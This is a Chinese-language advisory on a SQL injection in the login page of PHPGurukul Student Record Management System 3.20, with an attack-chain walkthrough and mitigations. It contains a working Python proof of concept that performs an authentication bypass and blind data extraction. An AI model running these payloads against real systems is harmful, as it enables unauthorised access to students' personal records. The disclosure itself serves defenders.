CVE-2024-55016 PHPGurukul学生记录管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2024-55016

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Student Record Management System 3.20

漏洞概述

PHPGurukul Student Record Management System 3.20版本存在严重的SQL注入漏洞，攻击者可以通过login.php页面中的id和password参数注入恶意SQL语句。该系统是一款基于PHP和MySQL的学生记录管理Web应用程序，广泛用于教育机构管理学生信息。漏洞允许未经认证的攻击者绕过登录验证机制，获取系统访问权限，进而可能导致学生个人信息泄露、数据库被篡改或进一步的内网渗透攻击。由于该系统通常部署在学校内部网络中，漏洞一旦被利用，将严重威胁学生隐私数据安全和学校信息安全。CVSS评分6.5分，中危等级，但考虑到涉及敏感学生数据，实际风险应引起高度重视。

技术细节

漏洞存在于login.php文件的认证处理逻辑中。当用户提交登录表单时，系统直接使用用户输入的id和password参数构建SQL查询语句，而未对输入进行充分的过滤和参数化处理。攻击者可以通过在id或password字段中注入SQL元字符和恶意SQL语句，如使用单引号闭合原语句并构造UNION SELECT或布尔盲注payload，实现绕过认证或提取数据库敏感信息。典型的攻击payload如在password字段输入' OR '1'='1可绕过密码验证。由于系统使用低权限数据库账户，攻击者可能通过UNION注入获取数据库版本、用户信息等元数据，或通过时间盲注逐步提取数据库中的学生记录信息。修复方案应采用参数化查询（Prepared Statements）替代字符串拼接方式，并对所有用户输入进行严格的输入验证和白名单过滤。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标网站使用的PHPGurukul Student Record Management System版本，确认是否为3.20版本

STEP 2

步骤2

漏洞探测：访问login.php页面，测试id和password参数是否存在SQL注入漏洞，使用单引号等特殊字符触发数据库错误

STEP 3

步骤3

绕过认证：利用SQL注入payload（如' OR '1'='1）构造恶意输入，绕过正常登录验证流程，获取未授权访问权限

STEP 4

步骤4

数据提取：通过UNION注入或布尔盲注技术，逐步提取数据库中的敏感信息，包括学生个人信息、教师账户等

STEP 5

步骤5

权限提升：利用获取的数据库信息尝试获取系统更高权限，或横向移动到其他相关系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2024-55016 SQL Injection PoC
# Target: PHPGurukul Student Record Management System 3.20
# Endpoint: login.php

target_url = "http://target-site.com/login.php"

# Basic authentication bypass payload
bypass_payload = {
    'id': "admin' OR '1'='1",
    'password': "admin' OR '1'='1"
}

# Blind boolean injection payload for data extraction
def extract_data_via_blind_injection():
    # Example: Extract database version using blind injection
    # This payload tests if database version starts with specific characters
    extracted_data = ""
    charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._-"
    
    for pos in range(1, 50):  # Adjust range based on expected data length
        for char in charset:
            payload = {
                'id': f"admin' AND SUBSTRING((SELECT database()),{pos},1)='{char}-- ",
                'password': 'test'
            }
            response = requests.post(target_url, data=payload)
            # Adjust condition based on actual application response
            if 'Login Success' in response.text or response.status_code == 302:
                extracted_data += char
                print(f"[*] Extracted: {extracted_data}")
                break
    return extracted_data

if __name__ == "__main__":
    print("[*] Testing CVE-2024-55016 SQL Injection")
    print(f"[*] Target: {target_url}")
    
    # Test authentication bypass
    print("[*] Testing authentication bypass...")
    response = requests.post(target_url, data=bypass_payload)
    
    if 'dashboard' in response.text.lower() or response.status_code == 302:
        print("[+] Authentication bypass successful!")
    else:
        print("[-] Authentication bypass failed")
        print("[*] Try blind injection technique...")
        data = extract_data_via_blind_injection()
        print(f"[+] Extracted data: {data}")

影响范围

PHPGurukul Student Record Management System 3.20

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1）临时关闭系统对外网的访问，仅限内网可信IP访问；2）在Web应用层部署输入过滤规则，拦截包含SQL特殊字符的请求；3）启用数据库操作日志审计，监控异常查询行为；4）考虑部署双因素认证机制，即使绕过SQL注入也无法直接登录系统；5）定期备份数据库，确保数据安全。